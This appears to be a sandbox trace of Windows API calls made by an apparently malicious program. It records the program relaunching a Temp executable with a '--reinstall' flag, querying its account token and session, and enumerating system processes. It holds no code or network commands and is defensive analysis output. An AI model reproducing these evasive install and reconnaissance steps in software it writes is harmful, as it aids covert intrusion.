	[0084.823] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp\" --reinstall", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x9000008, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x26afeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26afef4 | out: lpCommandLine="\"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp\" --reinstall", lpProcessInformation=0x26afef4*(hProcess=0x698, hThread=0x694, dwProcessId=0xe6c, dwThreadId=0xe68)) returned 1
	[0084.848] Sleep (dwMilliseconds=0x17f8d) 

Thread:
	id = 51
	os_tid = 0xd68

	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetLastError () returned 0x57
	[0070.332] GetCurrentProcessId () returned 0xdb0
	[0070.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x1c8
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] OpenProcessToken (in: ProcessHandle=0x1c8, DesiredAccess=0x20008, TokenHandle=0x27eff0c | out: TokenHandle=0x27eff0c*=0x1e8) returned 1
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.333] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.334] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x765a0000
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.335] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetProcAddress (hModule=0x765a0000, lpProcName="ProcessIdToSessionId") returned 0x765b8fa0
	[0070.336] ProcessIdToSessionId (in: dwProcessId=0xdb0, pSessionId=0x27efe28 | out: pSessionId=0x27efe28) returned 1
	[0070.336] FreeLibrary (hLibModule=0x765a0000) returned 1
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetLastError () returned 0x57
	[0070.336] GetTokenInformation (in: TokenHandle=0x1e8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x27eff00 | out: TokenInformation=0x0, ReturnLength=0x27eff00) returned 0
	[0070.336] GetLastError () returned 0x7a
	[0070.336] GetTokenInformation (in: TokenHandle=0x1e8, TokenInformationClass=0x1, TokenInformation=0x72b830, TokenInformationLength=0x24, ReturnLength=0x27eff00 | out: TokenInformation=0x72b830, ReturnLength=0x27eff00) returned 1
	[0070.336] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x72b838*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2e)), Name=0x7107d8, cchName=0x27efe58, ReferencedDomainName=0x7109e8, cchReferencedDomainName=0x27efe5c, peUse=0x27efe54 | out: Name="Nd9E1FYi", cchName=0x27efe58, ReferencedDomainName="X2VS1CUM", cchReferencedDomainName=0x27efe5c, peUse=0x27efe54) returned 1
	[0070.338] GetLastError () returned 0x0
	[0070.338] GetLastError () returned 0x0
	[0070.338] GetLastError () returned 0x0
	[0070.338] GetLastError () returned 0x0
	[0070.338] GetLastError () returned 0x0
	[0070.338] GetLastError () returned 0x0
	[0070.338] GetLastError () returned 0x0
	[0070.338] GetLastError () returned 0x0
	[0070.338] GetLastError () returned 0x0
	[0070.338] GetLastError () returned 0x0
	[0070.338] GetLastError () returned 0x0
	[0070.338] GetLastError () returned 0x0
	[0070.338] GetLastError () returned 0x0
	[0070.338] GetLastError () returned 0x0
	[0070.338] GetLastError () returned 0x0
	[0070.338] GetLastError () returned 0x0
	[0070.338] GetLastError () returned 0x0
	[0070.338] GetLastError () returned 0x0
	[0070.338] GetLastError () returned 0x0
	[0070.338] GetLastError () returned 0x0
	[0070.338] GetLastError () returned 0x0
	[0070.338] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] GetLastError () returned 0x0
	[0070.339] wsprintfW (in: param_1=0x433698, param_2="SESSION:\\\\%s\\%s\\%d" | out: param_1="SESSION:\\\\X2VS1CUM\\Nd9E1FYi\\1") returned 29
	[0070.340] CloseHandle (hObject=0x1e8) returned 1
	[0070.340] CloseHandle (hObject=0x1c8) returned 1
	[0070.340] GetCurrentProcessId () returned 0xdb0
	[0070.341] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x406260, lpParameter=0x728070, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c8
	[0070.341] CloseHandle (hObject=0x1c8) returned 1
	[0070.342] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4066b0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c8
	[0070.342] CloseHandle (hObject=0x1c8) returned 1
	[0070.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x167f8) returned 0xc0000004
	[0070.343] VirtualAlloc (lpAddress=0x0, dwSize=0x168f8, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0070.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x168f8, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0070.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0070.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7282f8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0070.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0070.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7282f8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0070.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7282f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0070.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7282f8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0070.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7282f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0070.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7282f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0070.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7282f8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0070.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7282f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0070.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7282f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0070.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dcf0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0070.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0070.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7282f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0070.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7282f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0070.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7282f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0070.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7282f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0070.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7282f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0070.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7282f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0070.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7282f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0070.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7282f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x220
	[0070.391] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.391] CloseHandle (hObject=0x220) returned 1
	[0070.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7282f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0070.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7282f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0070.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0070.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x220
	[0070.391] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.391] CloseHandle (hObject=0x220) returned 1
	[0070.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7289b8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0070.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0070.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7282f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x220
	[0070.392] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.392] CloseHandle (hObject=0x220) returned 1
	[0070.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7282f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x220
	[0070.392] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.392] CloseHandle (hObject=0x220) returned 1
	[0070.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7282f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x220
	[0070.392] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.392] CloseHandle (hObject=0x220) returned 1
	[0070.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7282f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x220
	[0070.392] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.392] CloseHandle (hObject=0x220) returned 1
	[0070.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728838, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0070.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x220
	[0070.393] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.393] CloseHandle (hObject=0x220) returned 1
	[0070.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7282f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x220
	[0070.393] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.393] CloseHandle (hObject=0x220) returned 1
